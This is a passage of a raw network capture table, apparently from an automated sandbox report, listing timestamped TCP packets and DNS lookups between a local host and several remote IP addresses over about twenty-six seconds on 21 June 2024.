                                                  Jun 21, 2024 04:27:30.796214104 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.796227932 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.796253920 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.796272993 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.805685997 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.805699110 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.805784941 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.805799961 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.805855989 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.806368113 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.806380987 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.806440115 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.806453943 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.806479931 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.806499004 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.806948900 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.806952000 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.807010889 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.807024002 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.807049990 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.807069063 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.808984995 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.809000015 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.809042931 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.809057951 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.809082985 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.809103966 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.809652090 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.809664965 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.809712887 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.809726954 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.809755087 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.809772968 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.876732111 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.876745939 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.876806021 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.876842022 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.876888037 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.876975060 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.877226114 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.877243042 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.877279997 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.877299070 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.877334118 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.877334118 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.883809090 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.883821011 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.883884907 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.883902073 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.884099960 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.893371105 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.893384933 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.893441916 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.893457890 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.893482924 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.893503904 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.893937111 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.893950939 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.893996954 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.894011021 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.894037962 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.894078016 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.894573927 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.894606113 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.894639969 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.894664049 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.894687891 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.896661997 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.896676064 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.896723986 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.896739006 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.896831989 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.897207022 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.897218943 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.897262096 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.897279024 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.897305965 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.964298964 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.964309931 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.964390039 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.964390039 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.964415073 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.964705944 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.964719057 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.964776993 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.964797020 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.971414089 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.971425056 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.971527100 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.971544027 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.980911970 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.980923891 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.980978966 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.980999947 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.981028080 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.981405973 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.981417894 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.981468916 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.981482983 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.981514931 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.982173920 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.982186079 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.982228041 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.982244015 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.982269049 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.984168053 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.984179020 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.984246016 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.984266996 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.984289885 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.984623909 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.984637022 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.984683037 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:30.984719992 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:30.984746933 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.052051067 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.052062988 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.052134037 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.052160025 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.052187920 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.052551985 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.052563906 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.052603960 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.052628040 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.052651882 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.059148073 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.059159994 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.059231043 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.059264898 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.068808079 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.068820000 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.068907976 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.068928957 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.069261074 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.069278002 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.069446087 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.069478035 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.070040941 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.070056915 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.070097923 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.070112944 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.070138931 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.071926117 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.071938992 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.072001934 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.072020054 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.072556973 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.072568893 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.072608948 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.072626114 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.072657108 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.077477932 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.077914000 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.140039921 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.140064955 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.140162945 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.140187979 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.140212059 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.140733004 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.140753031 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.140796900 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.140811920 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.140839100 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.146883011 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.146894932 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.146940947 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.146962881 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.146985054 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.156511068 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.156529903 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.156574011 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.156589031 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.156615019 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.157182932 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.157195091 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.157247066 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.157263994 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.157687902 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.157705069 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.157742023 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.157761097 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.157783985 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.159632921 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.159646034 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.159686089 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.159702063 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.159729004 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.160187006 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.160204887 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.160239935 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.160254002 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.160284996 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.178708076 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.178803921 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.227590084 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.227632999 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.227693081 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.227714062 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.227729082 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.228251934 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.228270054 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.228296995 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.228306055 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.228329897 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.228914976 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.229495049 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.229552984 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:31.229557991 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.229598045 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.233499050 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:31.242399931 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:38.759381056 CEST4974680192.168.2.4208.95.112.1
                                                  Jun 21, 2024 04:27:38.768147945 CEST8049746208.95.112.1192.168.2.4
                                                  Jun 21, 2024 04:27:38.768229961 CEST4974680192.168.2.4208.95.112.1
                                                  Jun 21, 2024 04:27:38.768310070 CEST4974680192.168.2.4208.95.112.1
                                                  Jun 21, 2024 04:27:38.773319006 CEST8049746208.95.112.1192.168.2.4
                                                  Jun 21, 2024 04:27:39.353378057 CEST8049746208.95.112.1192.168.2.4
                                                  Jun 21, 2024 04:27:39.406217098 CEST4974680192.168.2.4208.95.112.1
                                                  Jun 21, 2024 04:27:39.536803961 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:39.536847115 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:39.536912918 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:39.559487104 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:39.559530020 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.173664093 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.177284956 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.177328110 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.178235054 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.178313971 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.180032015 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.180099010 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.180285931 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.180392027 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.180434942 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.181238890 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.181286097 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.181864977 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.181920052 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.182089090 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.182117939 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.182719946 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.182737112 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.182768106 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.182785034 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.182817936 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.182836056 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183024883 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183043003 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183459997 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183481932 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183660984 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183684111 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183712006 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183727026 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183758020 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183773041 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183799028 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183828115 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183859110 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183876991 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183892965 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183907032 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.183948040 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.183969021 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.184551954 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184577942 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.184608936 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184626102 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.184652090 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184667110 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.184696913 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184726954 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184747934 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184767962 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184787035 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184811115 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184842110 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184864998 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184890985 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184926033 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.184926033 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.193479061 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.193861961 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.193886042 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.936928034 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.936944008 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.937004089 CEST44349747149.154.167.220192.168.2.4
                                                  Jun 21, 2024 04:27:40.937062025 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.937180996 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.937680006 CEST49747443192.168.2.4149.154.167.220
                                                  Jun 21, 2024 04:27:40.938221931 CEST4974680192.168.2.4208.95.112.1
                                                  Jun 21, 2024 04:27:40.943357944 CEST8049746208.95.112.1192.168.2.4
                                                  Jun 21, 2024 04:27:40.946244001 CEST4974680192.168.2.4208.95.112.1
                                                  Jun 21, 2024 04:27:42.829858065 CEST49748443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:42.829946041 CEST44349748185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:42.830064058 CEST49748443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:42.830302954 CEST49748443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:42.830334902 CEST44349748185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:43.303252935 CEST44349748185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:43.312819004 CEST49748443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:43.312900066 CEST44349748185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:43.411766052 CEST44349748185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:43.411825895 CEST44349748185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:43.411995888 CEST49748443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:43.412199974 CEST49748443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:45.642730951 CEST54417443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:45.642776012 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:45.642878056 CEST54417443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:45.643126965 CEST54417443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:45.643137932 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:46.102663040 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:46.102734089 CEST54417443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:46.104562998 CEST54417443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:46.104608059 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:46.104821920 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:46.106261969 CEST54417443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:46.152529955 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:46.201291084 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:46.201370955 CEST44354417185.199.111.133192.168.2.4
                                                  Jun 21, 2024 04:27:46.201451063 CEST54417443192.168.2.4185.199.111.133
                                                  Jun 21, 2024 04:27:46.205701113 CEST54417443192.168.2.4185.199.111.133
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 21, 2024 04:27:20.057917118 CEST5470953192.168.2.41.1.1.1
                                                  Jun 21, 2024 04:27:20.064992905 CEST53547091.1.1.1192.168.2.4
                                                  Jun 21, 2024 04:27:21.211312056 CEST5092353192.168.2.41.1.1.1
                                                  Jun 21, 2024 04:27:21.217933893 CEST53509231.1.1.1192.168.2.4
                                                  Jun 21, 2024 04:27:38.751970053 CEST4949853192.168.2.41.1.1.1
                                                  Jun 21, 2024 04:27:38.758703947 CEST53494981.1.1.1192.168.2.4
                                                  Jun 21, 2024 04:27:39.529364109 CEST5754753192.168.2.41.1.1.1
                                                  Jun 21, 2024 04:27:39.536168098 CEST53575471.1.1.1192.168.2.4
                                                  Jun 21, 2024 04:27:42.822154999 CEST5228353192.168.2.41.1.1.1
                                                  Jun 21, 2024 04:27:42.829255104 CEST53522831.1.1.1192.168.2.4
                                                  Jun 21, 2024 04:27:43.180891037 CEST5349500162.159.36.2192.168.2.4
                                                  Jun 21, 2024 04:27:43.667745113 CEST5175053192.168.2.41.1.1.1
                                                  Jun 21, 2024 04:27:43.685514927 CEST53517501.1.1.1192.168.2.4
